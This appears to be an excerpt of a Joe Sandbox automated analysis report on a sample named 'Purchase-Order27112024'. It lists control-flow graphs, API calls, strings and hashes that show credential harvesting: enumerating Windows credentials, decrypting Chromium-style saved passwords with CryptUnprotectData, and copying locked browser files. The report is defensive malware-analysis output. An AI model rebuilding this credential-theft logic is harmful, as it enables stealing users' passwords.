                                                                                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$FirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690352074-0
                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3558857096-0
                                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 
445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                      • API String ID: 1963886904-3798722523
                                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                      • API String ID: 2744995895-28296030
                                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                      • String ID: chp$v10
                                                                                                      • API String ID: 1297422669-2783969131
                                                                                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                      • String ID: bhv
                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2941347001-70141382
